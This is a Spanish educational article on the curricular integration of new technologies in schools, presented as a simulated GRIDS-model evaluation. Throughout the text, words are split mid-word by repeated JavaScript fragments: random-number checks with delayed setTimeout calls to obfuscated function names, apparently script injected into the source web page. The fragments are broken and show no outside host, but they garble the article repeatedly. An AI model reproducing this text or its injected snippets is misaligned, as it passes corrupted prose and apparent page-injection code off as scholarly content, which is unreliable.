LA INTEGRACIÓN CURRICULAR DE LAS NUEVAS TECNOLOGÍAS

Autora: Milagros García Habernau

INTRODUCCIÓN


            Este articulo consiste en una simulación basada en el modelo de evaluación de GRIDS (Guidelines for Review andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Internal Development in Schools) que valora el empleo inadecuado de las nuevas tecnologías en  los centros educativos.


             El primer paso para clarificar el tema al que nos vamos a referir sería precisar qué vamos a englobar bajo el epígrafe de “Nuevas Tecnologías”.  El término Nuevas Tecnologías hace referencia a todos aquellos equipos o sistemas técnicos que sirven de soporte a la información, a través de canales visuales, auditivos o de ambos.  Todas las tecnologías – ordenadores, CD-ROM, pantallas líquidas, vídeo interactivo, etc. – tienen grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes posibilidades dentro de la educación y formación de los alumnos. De hecho, aumentan las posibilidades hasta donde la imaginación y la técnica puedan llegar. Sin embargo, su implantación y uso en los centros educativos demuestran que no siempre se obtienen los resultados deseados. En esta simulación de evaluación intentaremos indagar el empleo inadecuado que, en muchas ocasiones, se está realizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sobre estos instrumentos y abordaremos los factores que están influyendo en nuestro objeto de estudio, siempre con la meta de buscar opciones de mejora que permitan obtener todas las ventajas que estos medios nos ofrecen. En definitiva, se trata de conseguir que la tecnología solucione problemas reales de educación, no que constituya un problema en sí misma o que la inadecuada aplicación de los diferentes medios los convierta en una moda pasajera, perdiéndose así una excelente oportunidad para la enseñanza.


 


 FASE 1: RECOGIDA DE INFORMACIÓN:


Factores implicados en el empleo inadecuado de las nuevas tecnologías en los centros educativos

          La influencia, en el mundo de la educación, de las nuevas tecnologías en general, y de los ordenadores en particular, puede concretarse en dos aspectos básicos siguiendo a Díaz y Batanero (1985): En primer lugar, la enseñanza de conocimientos y destrezas referentes al mundo de los ordenadores y la informática en general; en segundo, la utilización de las tecnologías de la información y la comunicación (de ahora en adelante T.I.C.) como recurso didáctico en la enseñanza de las distintas áreas del currículum. Para una clase de personas cada vez más amplia -científicos y  educadores- la utilización de los microordenadores, los CD-Rom, etc. como instrumentos didácticos va a significar (y está significandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando) una importante revolución en los modos de aprendizaje de todos los niveles del sistema educativo. Las razones para esta afirmación están en que esta nueva tecnología educativa facilita la puesta en práctica de dos principios pedagógicos de máximo interés, como son los de actividad e individualización, a través del uso de elementos tales como los programas interactivos.


           No obstante, en el empleo de las nuevas tecnologías en la educación no todo son ventajas. Existen críticas y recelos que no pueden ignorarse y es preciso analizar estos factores y tratar de encontrarles solución. Entre esos factores  destaco el de  la falta de integración curricular de las nuevas tecnologías.


  

FASE 2: LA INTEGRACIÓN CURRICULAR DE LAS NUEVAS TECNOLOGÍAS


            Si seguimos a Escudero (citado por Reparaz, Sobrino y Mir, 1995), la relación que se debe establecer entre las nuevas tecnologías y la educación debe ser integradora y no aditiva. Este autor propone dar primacía a lo curricular, a los valores y significados, sobre los medios; de manera que sean los proyectos educativos los que reclamen los medios y no a la inversa.


            Tenemos que tener claro que nos movemos en un contexto escolar, por lo que se trata de apostar por una innovación educativa y no técnica. Esto  exige una profunda reflexión sobre las posibilidades de las nuevas tecnologías como medio de desarrollo curricular, reflexionandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sobre cuestiones tales como las metas y propósitos de su uso, así como parámetros tales como cuándo, dónde, cómo, por qué y para quién. De lo contrario, se reducirán las posibilidades de intervención con estas herramientas en determinados ámbitos, materiales o alumnos. Los mismos autores nos informan de la importancia de una adecuada integración de las nuevas tecnologías a nivel curricular; pero ¿qué está ocurriendo en nuestros centros educativos? A lo largo de la evaluación intentaremos dar respuesta a esta pregunta.